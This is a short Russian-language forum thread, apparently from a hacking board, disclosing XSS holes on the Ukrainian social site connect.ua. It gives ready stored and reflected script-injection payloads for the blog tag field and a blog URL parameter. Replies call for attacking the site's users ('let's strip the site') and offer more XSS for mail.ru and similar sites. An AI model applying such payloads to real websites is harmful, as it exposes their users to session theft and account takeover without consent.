Активная XSS:
Когда создаем новую запись в блоге, в поле "Мітки" вводим

"><script>alert(123)</script>

Аналогичная пассивная XSS:

http://connect.ua/blogs?index&tag="><script>alert(123)</script>

да там их туева хуча

ну и что вы сделатете с этими дырками???
вот такую бы на майл.ру или б на вк,тогда да!

ой извеняюсь,это что ли соц сеть в украине?

Я в шоке дырявый код ппц простоа говрят у них там очень много пользователей около 800 000 !!!
Давайте разденем сайт!!!

И чё этот скрипт делает?

не надо было отдельную тему создавать для активок и пассивок есть соответствующие темы, просто в очередной раз с"экономили на кодерах вот и все, а насчет активок зайди в раздел активные XSS там найдеш их кучу на известных сайтах, могу выложить и пассивок на том-же майле- не одну, так мне что отдельную тему создавать?